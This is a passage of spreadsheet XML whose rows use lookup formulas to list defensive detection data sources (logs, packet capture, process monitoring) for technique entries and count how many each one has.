      <c r="F185" s="53"/>
      <c r="G185" s="19"/>
    </row>
    <row r="186" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A186" s="16" t="s">
        <v>302</v>
      </c>
      <c r="B186" s="53" t="str">
        <f>LOOKUP(A186,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
      <c r="C186" s="17" t="s">
        <v>303</v>
      </c>
      <c r="D186" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E186" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F186" s="53"/>
      <c r="G186" s="19"/>
    </row>
    <row r="187" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A187" s="16" t="s">
        <v>304</v>
      </c>
      <c r="B187" s="53" t="str">
        <f>LOOKUP(A187,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Packet capture,Process monitoring,API monitoring</v>
      </c>
      <c r="C187" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D187" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E187" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F187" s="53"/>
      <c r="G187" s="19"/>
    </row>
    <row r="188" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A188" s="16" t="s">
        <v>305</v>
      </c>
      <c r="B188" s="53" t="str">
        <f>LOOKUP(A188,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
      <c r="C188" s="17" t="s">
        <v>306</v>
      </c>
      <c r="D188" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E188" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F188" s="53"/>
      <c r="G188" s="19"/>
    </row>
    <row r="189" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A189" s="16" t="s">
        <v>307</v>
      </c>
      <c r="B189" s="53" t="str">
        <f>LOOKUP(A189,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Network protocol analysis,Network device logs,Process use of network</v>
      </c>
      <c r="C189" s="17" t="s">
        <v>259</v>
      </c>
      <c r="D189" s="53">
        <f t="shared" si="5"/>
        <v>4</v>
      </c>
      <c r="E189" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F189" s="53"/>
      <c r="G189" s="19"/>
    </row>
    <row r="190" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A190" s="16" t="s">
        <v>308</v>
      </c>
      <c r="B190" s="53" t="str">
        <f>LOOKUP(A190,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Network device logs,Process use of network,Web proxy,Network intrusion detection system,SSL/TLS inspection</v>
      </c>
      <c r="C190" s="17" t="s">
        <v>309</v>
      </c>
      <c r="D190" s="53">
        <f t="shared" si="5"/>
        <v>6</v>
      </c>
      <c r="E190" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F190" s="53"/>
      <c r="G190" s="19"/>
    </row>
    <row r="191" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A191" s="16" t="s">
        <v>310</v>
      </c>
      <c r="B191" s="53" t="str">
        <f>LOOKUP(A191,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C191" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D191" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E191" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F191" s="53"/>
      <c r="G191" s="19"/>
    </row>
    <row r="192" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A192" s="16" t="s">
        <v>311</v>
      </c>
      <c r="B192" s="53" t="str">
        <f>LOOKUP(A192,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C192" s="17" t="s">
        <v>312</v>
      </c>
      <c r="D192" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E192" s="53">
        <f t="shared" si="6"/>
        <v>4</v>
      </c>
      <c r="F192" s="53"/>
      <c r="G192" s="19"/>
    </row>
    <row r="193" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A193" s="16" t="s">
        <v>313</v>
      </c>
      <c r="B193" s="53" t="str">
        <f>LOOKUP(A193,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C193" s="17" t="s">
        <v>314</v>
      </c>
      <c r="D193" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E193" s="53">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F193" s="53"/>
      <c r="G193" s="19"/>
    </row>
    <row r="194" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A194" s="16" t="s">
        <v>315</v>
      </c>
      <c r="B194" s="53" t="str">
        <f>LOOKUP(A194,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C194" s="17" t="s">
        <v>316</v>
      </c>
      <c r="D194" s="53">
        <f t="shared" si="5"/>
        <v>7</v>
      </c>
      <c r="E194" s="53">
        <f t="shared" si="6"/>
        <v>6</v>
      </c>
      <c r="F194" s="53"/>
      <c r="G194" s="19"/>
    </row>
    <row r="195" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A195" s="16" t="s">
        <v>317</v>
      </c>
      <c r="B195" s="53" t="str">
        <f>LOOKUP(A195,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,AWS CloudTrail logs,Stackdriver logs,Packet capture,Web logs,Web application firewall logs,Application logs</v>
      </c>
      <c r="C195" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D195" s="53">
        <f t="shared" ref="D195:D258" si="7">LEN(TRIM(B195))-LEN(SUBSTITUTE(TRIM(B195),",",""))+1</f>
        <v>7</v>
      </c>
      <c r="E195" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F195" s="53"/>
      <c r="G195" s="19"/>
    </row>
    <row r="196" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A196" s="16" t="s">
        <v>318</v>
      </c>
      <c r="B196" s="53" t="str">
        <f>LOOKUP(A196,'REF-DataSources'!A:C)</f>
        <v>Web proxy,File monitoring</v>
      </c>
      <c r="C196" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D196" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E196" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F196" s="53"/>
      <c r="G196" s="19"/>
    </row>
    <row r="197" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A197" s="16" t="s">
        <v>319</v>
      </c>
      <c r="B197" s="53" t="str">
        <f>LOOKUP(A197,'REF-DataSources'!A:C)</f>
        <v>Component firmware,BIOS,Disk forensics,EFI</v>
      </c>
      <c r="C197" s="17" t="s">
        <v>320</v>
      </c>
      <c r="D197" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E197" s="53">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F197" s="53"/>
      <c r="G197" s="19"/>
    </row>
    <row r="198" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A198" s="16" t="s">
        <v>321</v>
      </c>
      <c r="B198" s="53" t="str">
        <f>LOOKUP(A198,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
      <c r="C198" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D198" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E198" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F198" s="53"/>
      <c r="G198" s="19"/>
    </row>
    <row r="199" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A199" s="16" t="s">
        <v>322</v>
      </c>
      <c r="B199" s="53" t="str">
        <f>LOOKUP(A199,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Packet capture,Windows event logs</v>
      </c>
      <c r="C199" s="17" t="s">
        <v>320</v>
      </c>
      <c r="D199" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E199" s="53">
        <f t="shared" si="6"/>
        <v>7</v>
      </c>
      <c r="F199" s="53"/>
      <c r="G199" s="19"/>
    </row>
    <row r="200" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A200" s="16" t="s">
        <v>323</v>
      </c>
      <c r="B200" s="53" t="str">
        <f>LOOKUP(A200,'REF-DataSources'!A:C)</f>
        <v>Azure activity logs,Stackdriver logs,AWS CloudTrail logs,Application logs,Authentication logs,Third-party application logs</v>
      </c>
      <c r="C200" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D200" s="53">
        <f t="shared" si="7"/>
        <v>6</v>
      </c>
      <c r="E200" s="53">
        <f t="shared" si="6"/>
        <v>3</v>
      </c>
      <c r="F200" s="53"/>
      <c r="G200" s="19"/>
    </row>
    <row r="201" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A201" s="16" t="s">
        <v>324</v>
      </c>
      <c r="B201" s="53" t="str">
        <f>LOOKUP(A201,'REF-DataSources'!A:C)</f>
        <v>Asset management,Data loss prevention</v>
      </c>
      <c r="C201" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D201" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E201" s="53">
        <f t="shared" si="6"/>
        <v>2</v>
      </c>
      <c r="F201" s="53"/>
      <c r="G201" s="19"/>
    </row>
    <row r="202" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A202" s="16" t="s">
        <v>325</v>
      </c>
      <c r="B202" s="53" t="str">
        <f>LOOKUP(A202,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C202" s="17" t="s">
        <v>126</v>
      </c>
      <c r="D202" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E202" s="53">
        <f t="shared" ref="E202:E265" si="8">LEN(TRIM(C202))-LEN(SUBSTITUTE(TRIM(C202),";",""))+1</f>
        <v>2</v>
      </c>
      <c r="F202" s="53"/>
      <c r="G202" s="19"/>
    </row>
    <row r="203" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A203" s="16" t="s">
        <v>326</v>
      </c>
      <c r="B203" s="53" t="str">
        <f>LOOKUP(A203,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C203" s="17" t="s">
        <v>230</v>
      </c>
      <c r="D203" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E203" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F203" s="53"/>
      <c r="G203" s="19"/>
    </row>
    <row r="204" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A204" s="16" t="s">
        <v>327</v>
      </c>
      <c r="B204" s="53" t="str">
        <f>LOOKUP(A204,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,System calls,Process monitoring</v>
      </c>
      <c r="C204" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D204" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E204" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F204" s="53"/>
      <c r="G204" s="19"/>
    </row>
    <row r="205" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A205" s="16" t="s">
        <v>328</v>
      </c>
      <c r="B205" s="53" t="str">
        <f>LOOKUP(A205,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C205" s="17" t="s">
        <v>74</v>
      </c>
      <c r="D205" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E205" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F205" s="53"/>
      <c r="G205" s="19"/>
    </row>
    <row r="206" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A206" s="16" t="s">
        <v>329</v>
      </c>
      <c r="B206" s="53" t="str">
        <f>LOOKUP(A206,'REF-DataSources'!A:C)</f>
        <v>Packet capture,Netflow/Enclave netflow</v>
      </c>
      <c r="C206" s="17">
        <v>0</v>
      </c>
      <c r="D206" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E206" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F206" s="53"/>
      <c r="G206" s="19"/>
    </row>
    <row r="207" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A207" s="16" t="s">
        <v>330</v>
      </c>
      <c r="B207" s="53" t="str">
        <f>LOOKUP(A207,'REF-DataSources'!A:C)</f>
        <v>Netflow/Enclave netflow,Packet capture</v>
      </c>
      <c r="C207" s="17" t="s">
        <v>63</v>
      </c>
      <c r="D207" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E207" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F207" s="53"/>
      <c r="G207" s="19"/>
    </row>
    <row r="208" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A208" s="16" t="s">
        <v>331</v>
      </c>
      <c r="B208" s="53" t="str">
        <f>LOOKUP(A208,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C208" s="17" t="s">
        <v>332</v>
      </c>
      <c r="D208" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E208" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F208" s="53"/>
      <c r="G208" s="19"/>
    </row>
    <row r="209" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A209" s="16" t="s">
        <v>333</v>
      </c>
      <c r="B209" s="53" t="str">
        <f>LOOKUP(A209,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C209" s="17">
        <v>100</v>
      </c>
      <c r="D209" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E209" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F209" s="53"/>
      <c r="G209" s="19"/>
    </row>
    <row r="210" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A210" s="16" t="s">
        <v>334</v>
      </c>
      <c r="B210" s="53" t="str">
        <f>LOOKUP(A210,'REF-DataSources'!A:C)</f>
        <v>API monitoring,Authentication logs,Network protocol analysis,Packet capture</v>
      </c>
      <c r="C210" s="17" t="s">
        <v>335</v>
      </c>
      <c r="D210" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E210" s="53">
        <f t="shared" si="8"/>
        <v>6</v>
      </c>
      <c r="F210" s="53"/>
      <c r="G210" s="19"/>
    </row>
    <row r="211" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A211" s="16" t="s">
        <v>336</v>
      </c>
      <c r="B211" s="53" t="str">
        <f>LOOKUP(A211,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C211" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D211" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E211" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F211" s="53"/>
      <c r="G211" s="19"/>
    </row>
    <row r="212" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A212" s="16" t="s">
        <v>337</v>
      </c>
      <c r="B212" s="53" t="str">
        <f>LOOKUP(A212,'REF-DataSources'!A:C)</f>
        <v>Windows Error Reporting,Process monitoring,File monitoring</v>
      </c>
      <c r="C212" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D212" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E212" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F212" s="53"/>
      <c r="G212" s="19"/>
    </row>
    <row r="213" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A213" s="16" t="s">
        <v>338</v>
      </c>
      <c r="B213" s="53" t="str">
        <f>LOOKUP(A213,'REF-DataSources'!A:C)</f>
        <v>Authentication logs,Windows Error Reporting,Process monitoring</v>
      </c>
      <c r="C213" s="17" t="s">
        <v>71</v>
      </c>
      <c r="D213" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E213" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F213" s="53"/>
      <c r="G213" s="19"/>
    </row>
    <row r="214" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A214" s="16" t="s">
        <v>339</v>
      </c>
      <c r="B214" s="53" t="str">
        <f>LOOKUP(A214,'REF-DataSources'!A:C)</f>
        <v>OAuth audit logs,Application logs,Authentication logs,Data loss prevention,Third-party application logs</v>
      </c>
      <c r="C214" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D214" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E214" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F214" s="53"/>
      <c r="G214" s="19"/>
    </row>
    <row r="215" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A215" s="16" t="s">
        <v>340</v>
      </c>
      <c r="B215" s="53" t="str">
        <f>LOOKUP(A215,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
      <c r="C215" s="17" t="s">
        <v>209</v>
      </c>
      <c r="D215" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E215" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F215" s="53"/>
      <c r="G215" s="19"/>
    </row>
    <row r="216" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A216" s="16" t="s">
        <v>341</v>
      </c>
      <c r="B216" s="53" t="str">
        <f>LOOKUP(A216,'REF-DataSources'!A:C)</f>
        <v>Office 365 audit logs,Authentication logs,Application logs</v>
      </c>
      <c r="C216" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D216" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E216" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F216" s="53"/>
      <c r="G216" s="19"/>
    </row>
    <row r="217" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A217" s="16" t="s">
        <v>342</v>
      </c>
      <c r="B217" s="53" t="str">
        <f>LOOKUP(A217,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C217" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D217" s="53">
        <f t="shared" si="7"/>
        <v>2</v>
      </c>
      <c r="E217" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F217" s="53"/>
      <c r="G217" s="19"/>
    </row>
    <row r="218" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A218" s="16" t="s">
        <v>343</v>
      </c>
      <c r="B218" s="53" t="str">
        <f>LOOKUP(A218,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C218" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D218" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E218" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F218" s="53"/>
      <c r="G218" s="19"/>
    </row>
    <row r="219" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A219" s="16" t="s">
        <v>344</v>
      </c>
      <c r="B219" s="53" t="str">
        <f>LOOKUP(A219,'REF-DataSources'!A:C)</f>
        <v>API monitoring,File monitoring,Binary file metadata,Process use of network,Windows Registry,Loaded DLLs,DLL monitoring,Process monitoring,Process command-line parameters</v>
      </c>
      <c r="C219" s="17" t="s">
        <v>55</v>
      </c>
      <c r="D219" s="53">
        <f t="shared" si="7"/>
        <v>9</v>
      </c>
      <c r="E219" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F219" s="53"/>
      <c r="G219" s="19"/>
    </row>
    <row r="220" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A220" s="16" t="s">
        <v>345</v>
      </c>
      <c r="B220" s="53" t="str">
        <f>LOOKUP(A220,'REF-DataSources'!A:C)</f>
        <v>Network intrusion detection system,Network protocol analysis,Process use of network,Process monitoring</v>
      </c>
      <c r="C220" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D220" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E220" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F220" s="53"/>
      <c r="G220" s="19"/>
    </row>
    <row r="221" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A221" s="16" t="s">
        <v>346</v>
      </c>
      <c r="B221" s="53" t="str">
        <f>LOOKUP(A221,'REF-DataSources'!A:C)</f>
        <v>Process monitoring,Process command-line parameters,Process use of network,DLL monitoring</v>
      </c>
      <c r="C221" s="17" t="s">
        <v>312</v>
      </c>
      <c r="D221" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E221" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F221" s="53"/>
      <c r="G221" s="19"/>
    </row>
    <row r="222" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A222" s="16" t="s">
        <v>347</v>
      </c>
      <c r="B222" s="53" t="str">
        <f>LOOKUP(A222,'REF-DataSources'!A:C)</f>
        <v>Anti-virus,Email gateway,Network intrusion detection system,Web logs</v>
      </c>
      <c r="C222" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D222" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E222" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F222" s="53"/>
      <c r="G222" s="19"/>
    </row>
    <row r="223" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A223" s="16" t="s">
        <v>348</v>
      </c>
      <c r="B223" s="53" t="str">
        <f>LOOKUP(A223,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</v>
      </c>
      <c r="C223" s="17" t="s">
        <v>184</v>
      </c>
      <c r="D223" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E223" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F223" s="53"/>
      <c r="G223" s="19"/>
    </row>
    <row r="224" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A224" s="16" t="s">
        <v>349</v>
      </c>
      <c r="B224" s="53" t="str">
        <f>LOOKUP(A224,'REF-DataSources'!A:C)</f>
        <v>Process command-line parameters,Process monitoring,File monitoring</v>
      </c>
      <c r="C224" s="17" t="s">
        <v>52</v>
      </c>
      <c r="D224" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E224" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F224" s="53"/>
      <c r="G224" s="19"/>
    </row>
    <row r="225" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A225" s="16" t="s">
        <v>350</v>
      </c>
      <c r="B225" s="53" t="str">
        <f>LOOKUP(A225,'REF-DataSources'!A:C)</f>
        <v>Process monitoring</v>
      </c>
      <c r="C225" s="17">
        <v>100</v>
      </c>
      <c r="D225" s="53">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E225" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F225" s="53"/>
      <c r="G225" s="19"/>
    </row>
    <row r="226" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A226" s="16" t="s">
        <v>351</v>
      </c>
      <c r="B226" s="53" t="str">
        <f>LOOKUP(A226,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C226" s="17" t="s">
        <v>352</v>
      </c>
      <c r="D226" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E226" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F226" s="53"/>
      <c r="G226" s="19"/>
    </row>
    <row r="227" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A227" s="16" t="s">
        <v>353</v>
      </c>
      <c r="B227" s="53" t="str">
        <f>LOOKUP(A227,'REF-DataSources'!A:C)</f>
        <v>PowerShell logs,API monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C227" s="17" t="s">
        <v>354</v>
      </c>
      <c r="D227" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E227" s="53">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F227" s="53"/>
      <c r="G227" s="19"/>
    </row>
    <row r="228" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A228" s="16" t="s">
        <v>355</v>
      </c>
      <c r="B228" s="53" t="str">
        <f>LOOKUP(A228,'REF-DataSources'!A:C)</f>
        <v>Windows event logs</v>
      </c>
      <c r="C228" s="17">
        <v>100</v>
      </c>
      <c r="D228" s="53">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="E228" s="53">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="F228" s="53"/>
      <c r="G228" s="19"/>
    </row>
    <row r="229" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A229" s="16" t="s">
        <v>356</v>
      </c>
      <c r="B229" s="53" t="str">
        <f>LOOKUP(A229,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C229" s="17" t="s">
        <v>130</v>
      </c>
      <c r="D229" s="53">
        <f t="shared" si="7"/>
        <v>3</v>
      </c>
      <c r="E229" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F229" s="53"/>
      <c r="G229" s="19"/>
    </row>
    <row r="230" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A230" s="16" t="s">
        <v>357</v>
      </c>
      <c r="B230" s="53" t="str">
        <f>LOOKUP(A230,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C230" s="17" t="s">
        <v>358</v>
      </c>
      <c r="D230" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E230" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F230" s="53"/>
      <c r="G230" s="19"/>
    </row>
    <row r="231" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A231" s="16" t="s">
        <v>359</v>
      </c>
      <c r="B231" s="53" t="str">
        <f>LOOKUP(A231,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C231" s="17" t="s">
        <v>140</v>
      </c>
      <c r="D231" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E231" s="53">
        <f t="shared" si="8"/>
        <v>2</v>
      </c>
      <c r="F231" s="53"/>
      <c r="G231" s="19"/>
    </row>
    <row r="232" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A232" s="16" t="s">
        <v>360</v>
      </c>
      <c r="B232" s="53" t="str">
        <f>LOOKUP(A232,'REF-DataSources'!A:C)</f>
        <v>Kernel drivers,File monitoring,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C232" s="17" t="s">
        <v>107</v>
      </c>
      <c r="D232" s="53">
        <f t="shared" si="7"/>
        <v>4</v>
      </c>
      <c r="E232" s="53">
        <f t="shared" si="8"/>
        <v>3</v>
      </c>
      <c r="F232" s="53"/>
      <c r="G232" s="19"/>
    </row>
    <row r="233" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A233" s="16" t="s">
        <v>361</v>
      </c>
      <c r="B233" s="53" t="str">
        <f>LOOKUP(A233,'REF-DataSources'!A:C)</f>
        <v>File monitoring,Process command-line parameters,Process monitoring,Windows Registry,API monitoring</v>
      </c>
      <c r="C233" s="17" t="s">
        <v>45</v>
      </c>
      <c r="D233" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E233" s="53">
        <f t="shared" si="8"/>
        <v>4</v>
      </c>
      <c r="F233" s="53"/>
      <c r="G233" s="19"/>
    </row>
    <row r="234" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A234" s="16" t="s">
        <v>362</v>
      </c>
      <c r="B234" s="53" t="str">
        <f>LOOKUP(A234,'REF-DataSources'!A:C)</f>
        <v>Windows Registry,Services,Windows event logs,Process command-line parameters,Process monitoring</v>
      </c>
      <c r="C234" s="17" t="s">
        <v>67</v>
      </c>
      <c r="D234" s="53">
        <f t="shared" si="7"/>
        <v>5</v>
      </c>
      <c r="E234" s="53">
        <f t="shared" si="8"/>
        <v>5</v>
      </c>
      <c r="F234" s="53"/>
      <c r="G234" s="19"/>
    </row>
    <row r="235" spans="1:7" x14ac:dyDescent="0.2">
      <c r="A235" s="16" t="s">
        <v>363</v>
      </c>
      <c r="B235" s="53" t="str">
        <f>LOOKUP(A235,'REF-DataSources'!A:C)</f>
